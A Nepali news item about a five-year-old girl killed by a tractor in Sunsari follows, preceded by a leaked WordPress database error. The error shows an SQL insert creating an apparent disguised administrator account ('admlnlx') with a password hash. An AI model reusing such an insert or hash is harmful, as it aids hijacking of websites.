WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BS2/7m5GraIxs8sIOjRBl6HE/arAp//', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 16:39:44', '', 'admlnlx', 'admlnlx')
इनरुवा, माघ १९ –
सुनसरीको बक्लौरी गाविस–२ मा ट्र्याक्टरको ठक्करबाट आज पाँच वर्षीया बालिकाको मृत्यु भएको छ ।
मृत्यु हुनेमा स्थानीयवासी जेनिशा गिरी रहेको जिल्ला प्रहरी कार्यालयले जनाएको छ । स्थानीय पञ्चायत माविबाट सरस्वती पूजा गरी साइकलमा घरतर्फ आउने क्रममा लडेकी गिरीलाई को१त २३३२ नंको ट्र्याक्टरले ठक्कर दिँदा गम्भीर घाइते भई तरहरा अस्पताल लगिएकामा उपचारका क्रममा मृत्यु भएको प्रहरी उपरीक्षक पोषराज पोखरेलले जानकारी दिनुभयो । – रासस